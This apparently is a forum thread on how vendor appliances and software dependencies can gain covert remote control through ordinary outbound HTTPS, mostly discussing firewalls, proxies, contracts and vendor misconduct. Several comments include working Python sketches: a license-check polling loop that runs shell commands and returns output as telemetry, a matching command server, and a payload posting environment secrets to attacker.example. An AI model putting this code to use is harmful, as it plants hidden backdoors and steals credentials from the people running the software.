I understand the technical issue, but in a broader sense: the instant a vendor-supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor-controlled endpoint, doesn't that immediately, technically, allow full remote control?
Lots of talk about tunneling and wrapping/disguising ssh but a vendor does not need any of that to control its machine.
For example, you could have the on-prem host poll a "licensing" or "software update" server that also happens to reply with ad-hoc commands to execute on demand. They could be straight-up shell commands, with the results sent back the same way. No need for SSH, long-lived connections, reverse tunnels or anything.
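A minimal sketch of that polling loop in Python (the endpoint paths and response format are invented for illustration): an empty reply means "no update available", anything else is treated as a shell command, and the output travels back disguised as telemetry.

```python
# Hypothetical sketch of a C2 channel hidden in a "license check".
# Endpoint paths and the bare-command protocol are made up here.
import subprocess
import urllib.request

def poll_once(base_url: str) -> str:
    """One 'license check'. Returns the command output, or '' when there is no work."""
    with urllib.request.urlopen(base_url + "/api/v1/license/check") as resp:
        cmd = resp.read().decode().strip()
    if not cmd:
        return ""  # an ordinary-looking "license OK" response
    # the "license server" handed us a shell command: run it
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
    # ship the result back disguised as a routine telemetry upload
    req = urllib.request.Request(base_url + "/api/v1/telemetry",
                                 data=out.encode(), method="POST")
    urllib.request.urlopen(req).close()
    return out
```

From the firewall's point of view this is two short outbound HTTPS requests to a plausible-looking API; nothing distinguishes it from a real license check.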
The only way to mitigate this is to fully trust the vendor, have a strong legal framework to protect against wrongdoing, or fully block all internet access to endpoints you don't fully control.
I understand where you are coming from, and I agree it should be assumed a vendor box can do anything even without SSH. Other teams don't think this way, however. "Oh, it's just outbound HTTPS, no inbound connections, totally fine" was the school of thought I was up against. On top of that, the box was expected to send hundreds of GB of logs daily for "big data" analysis to monitor its health, thus training firewalls, IDS and humans to expect this outbound data volume, which could with the flip of a bit start exfiltrating customer data instead. If I told you what this box was for, you would know how insane it would be to send more than 500KB per day for that purpose. It seems I share something in common with Boeing "line stoppers". There are details I wish I could share, as they would drive home how insane this entire debacle was. I expect to read about it in the news some day.
This is always the problem with firewalls. If your adversary controls both ends of the connection then it's not outbound HTTPS traffic you're letting through. It's totally arbitrary two-way traffic that happens to be transmitted over a connection first established to port 443 on the remote host.
The only useful technical defence against this kind of deception today is deep packet inspection and a policy of blocking everything by default and only permitting through packets you can actively approve. But that becomes very expensive very quickly and there are practical limits on how far you can go. Ultimately if your adversary is willing to engage covertly in the kind of hacks mentioned in the article then they're probably also willing to engage in steganography to get past whatever DPI rules you can afford to run. Then you're back to square one and either you trust their device or you sandbox it.
In reality a more effective defence is probably the one involving contracts with severe penalties for this kind of behaviour and liability for any consequential losses.
This is a good point. I would expect that a device like a SAN is just sending telemetry/logs/diagnostics back to the mothership for support purposes. Having a persistent tunnel kind of sucks, and I much prefer something like shell access being done over a remote support/screen-sharing app so I can see what they are doing. Previous security fiascos like the SolarWinds hack come to mind, where an attacker could have gained a foothold inside a trusted/internal network.
To be properly paranoid, I would allow the device to send telemetry and diagnostics, but only through my proxy. The outbound stream can be as encrypted as they want, but I will demand the ability to decode the answer, and decide whether I let it come back to the box.
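One hedged sketch of what "decide whether I let it come back" could look like at such a proxy, assuming (hypothetically) that the vendor documents a small JSON acknowledgement schema for you; the field names below are made up:

```python
# Policy check a decrypting proxy could apply to vendor replies before
# forwarding them to the appliance. The schema is invented for illustration:
# only a small, fully-understood JSON acknowledgement is permitted through.
import json

ALLOWED_REPLY_KEYS = {"status", "case_id", "next_poll_seconds"}

def reply_allowed(raw_body: bytes) -> bool:
    """True only if the decoded reply matches the documented ack schema."""
    try:
        doc = json.loads(raw_body)
    except ValueError:
        return False  # opaque blobs don't get to reach the box
    return isinstance(doc, dict) and set(doc) <= ALLOWED_REPLY_KEYS
```

Anything the proxy can't decode and recognise simply never reaches the appliance, which closes the "reply happens to contain commands" channel described upthread.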
I wonder how many vendors would agree to offer this, and how much more it would then cost.
(If you install software updates from the vendor's servers, all bets are off, because you're just running their software, which can do anything your security measures don't prevent it from doing. You have to very seriously trust the vendor of your OS if you may be a high-value target.)
Nah. I’ve seen similar stunts pulled off with companies like Microsoft.
Sales teams who believe a full funnel is in front of them are capable of incredible feats. You need to have the air cover and the willingness to scorch the earth.
But it's their device, and you're installing it in your network - if they wanted to do something malicious, they would. If you shut down the tunneling method detailed in the article, they could just add an endpoint like:
GET /latest-command
that resolves to a shell script to be run periodically.
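For illustration, the vendor's side of that endpoint is only a few lines; everything here (the path, the in-memory command queue) is hypothetical:

```python
# Hypothetical vendor-side view of the endpoint described above: a queue
# of ad-hoc shell snippets, drained one per poll, with an empty 200 otherwise.
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

pending_commands = []  # an operator pushes commands here on demand

class CommandHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/latest-command" and pending_commands:
            body = pending_commands.pop(0).encode()
        else:
            body = b""  # nothing queued: looks like a boring, quiet endpoint
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the access log quiet
        pass

def serve(port: int = 0) -> ThreadingHTTPServer:
    """Bind the 'command server' on localhost; port 0 picks a free port."""
    return ThreadingHTTPServer(("127.0.0.1", port), CommandHandler)
```

Most of the time the endpoint returns nothing at all, so even a human reviewing the traffic sees an uneventful polling loop.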
> start exfiltrating customer data
If it's data that they're supposed to have access to, they're already doing that. If it's data they're not supposed to have access to, the correct fix is to DMZ the box, not to try (hopelessly) to limit its outbound connectivity.
>fully block all internet access to endpoints you don't fully control.
Not that all risk can be eliminated, but this simplifies management while reducing the attack surface area by orders of magnitude.
The good news is companies are increasingly doing it now that technology has finally caught up - now that implementing a private* network with each vendor (or a private extranet across all vendors) is actually viable and sensible.
* Usually a software-only, zero implicit trust overlay network
All the cloud networks are software (defined network) a very long way down, far below what is exposed to customers, so any overlay is going to have to be software.
If you mean overlays that don't require an endpoint agent, there are plenty of solutions that will orchestrate cloud-native SDN enforcement capabilities, like AWS network ACLs or Azure NSGs, rather than trying to handle enforcement on the resource directly with an agent.
I appreciate the response, but I think you misunderstood my question. OP mentioned a "software-only, zero implicit trust overlay network". In my head, all overlay networks are software-only (and, from your answer, in your conception too). I was trying to figure out why OP said "software-only": was it redundant, or a useful way to distinguish it from another category of overlay network?
> Are there overlay networks that are not software only?
In the defense and government security space there are 'hardware' overlay network devices. One common use is extending classified 'airgapped' networks over less secure networks or the internet. 'Inline Network Encryptor' is a generic term; 'Taclane' is one brand; HAIPE is I think an applicable NSA standard.
> I understand the technical issue, but in a broader sense: the instant a vendor-supplied black box is installed behind your firewall and allowed to make any sort of communication towards a vendor-controlled endpoint, doesn't that immediately, technically, allow full remote control?
In the sense of "isn't it now possible on a technical level?", yes.
On a legal level? You're breaking into their network. At least in the US, but almost certainly in many other jurisdictions too, there's a very non-zero chance you're engaged in illegal activity. https://www.justice.gov/jm/jm-9-48000-computer-fraud
On a PR level? Definitely not. The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks. Even the helpdesk guys are gonna be telling their buddies over beers "you wouldn't believe what our netsec team caught our appliance from DumbassCo doing..."
That doesn't even get into the liabilities involved if the client has to meet security requirements from the government (as a contractor), PCI compliance, HIPAA compliance, SEC rules, etc. Imagine a client losing a certification that's a core part of their business because of your network appliance...
And then there's the liability if the remote access capability turns out to be a security vulnerability that can be exploited by outside parties, is abused by an employee, or hackers break into your company and jump off from there to your clients.
There is nothing difficult about respecting "no, you may not have remote access to our network or this system" with no reason or justification provided. They don't need to justify or explain it to you. It's their network. Change the support contract terms if necessary, but don't do anything the author idiotically suggests.
I see people claiming that "it should be assumed the vendor can access your network" - legally speaking, no, it sure shouldn't. That's like saying "if you buy a laptop with a camera and microphone you should assume the laptop manufacturer can spy on you."
If you work at a company that does this sort of nonsense, now would be an excellent time to deactivate any "hack our way into customer-owned equipment or networks" functionality and urgently schedule a meeting with some lawyers.
> The customer will be furious when they find out, and everyone who knows about it will tell everyone they know what you did, post about it on reddit/twitter/linkedin, not to mention discords and slacks.
It wouldn't matter. People will bitch about it online for a few days, the company will make some lame PR statement about how sorry they are and how they'll take steps to prevent it from happening again, and then everyone will move on to the next outrage and the company will continue to thrive.
Look at Lenovo: they've repeatedly shipped computers with malware and backdoors, sometimes because they were being paid to, and people still buy them.
How many times have router manufacturers included the most brain dead security flaws like hard coded passwords and backdoors? How many companies have leaked private data to the world? Wells Fargo fraudulently opened accounts. HSBC laundered money for terrorists. Microsoft and Amazon were caught illegally harvesting data on children. Philips and Johnson & Johnson outright murdered people by continuing to sell products they knew were giving people cancer. Nobody went out of business. Even CrowdStrike is still around. The most universally hated companies in the US are also among the most successful.
I mean, couldn’t any semi-popular transitive dependency installed with <insert package manager here> do the same thing with a reverse tunnel? Imagine a simple Go module that kicks off a background goroutine that just keeps a tunnel open with a direct call to os/exec. Seems like an easy way to cat env and pipe secrets back to the attacker.
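The comment imagines a Go module, but the trick is language-agnostic. Here's a Python sketch of the same idea, with the collection URL as an obvious placeholder: importing the package (or calling one innocuous-looking function) starts a background thread that ships os.environ off-box.

```python
# What a malicious transitive dependency could do at import time: quietly
# launch a background thread that posts the environment somewhere. The
# destination URL is a placeholder; a real package would hide these few
# lines far better than this.
import os
import threading
import urllib.request

def _phone_home(url: str) -> None:
    # env vars are where CI systems and apps tend to keep their secrets
    payload = "\n".join(f"{k}={v}" for k, v in os.environ.items()).encode()
    try:
        req = urllib.request.Request(url, data=payload, method="POST")
        urllib.request.urlopen(req).close()
    except OSError:
        pass  # fail silently; there's always the next import

def start_exfil(url: str = "https://attacker.example/collect") -> threading.Thread:
    """A real package would call this from module top level, on import."""
    t = threading.Thread(target=_phone_home, args=(url,), daemon=True)
    t.start()
    return t
```

Because the thread is a daemon and swallows errors, the host application never notices anything, whether the upload succeeds or not.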
That's what I was thinking. Or any application at all. If MS Word started doing this, how long would it take to recognise? Especially if it's only periodic and only in some small percentage of their install base.
This said there are a few companies that monitor this kind of stuff in 'popular' open source packages and provide services to their customers to block packages that do things like this. Unfortunately it's pretty expensive.